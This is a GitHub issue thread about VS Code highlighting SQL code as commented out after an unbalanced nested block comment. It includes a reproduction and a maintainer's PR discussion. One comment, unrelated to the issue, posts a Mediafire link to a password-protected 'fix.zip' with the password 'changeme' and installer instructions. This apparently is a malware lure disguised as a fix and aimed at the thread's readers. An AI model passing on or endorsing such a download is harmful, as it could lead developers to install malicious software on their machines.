### ISSUE TITLE
SQL file syntax error: openning block comments more than closing comments cause sql sytnax error in textmate config

### ISSUE THREAD

**Issue by CloudsDocker** [microsoft/vscode#226923]
Does this issue occur when all extensions are disabled?: Yes/No

- VS Code Version: 
- OS Version: 

Steps to Reproduce:

1. Disable all running extension in VSCode
2. Open editor to chose sql syntax for below code 
```
use users;
/*
Here is level 1 comments

/* herere is level 2 comments

-- even more comments

*/

Select * from departs;
```

3. You'll see last sql (select *) is show as commented, which is actualy a valid SQL statement  
![image](https://github.com/user-attachments/assets/27cf5fd4-1118-4495-9dfa-eb8e7fcb75ef)

4. This is because there are two openning block comment (/*) but only one closing (*/) , this is due to poor user comments but VScode better to cater for such case

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RedCMD** [comment]
you want VSCode to display an error when the user writes broken comments?

**Comment by CloudsDocker** [comment]
> you want VSCode to display an error when the user writes broken comments?

Thanks @RedCMD  comments, not meant to show *error* but it'd great to make VSCode accomodate such kind of comments from users, as this is harmless to properly show SQL syntax. And this is widely used in many SQL editors which would accomodate missing closing block comment in the middle.

**Comment by RedCMD** [comment]
PR: https://github.com/microsoft/vscode/pull/226924
this would break nested comments tho
reverts previous PR: https://github.com/microsoft/vscode-mssql/pull/17708

related:
https://github.com/microsoft/azuredatastudio/issues/19205
https://github.com/microsoft/vscode-mssql/issues/1014
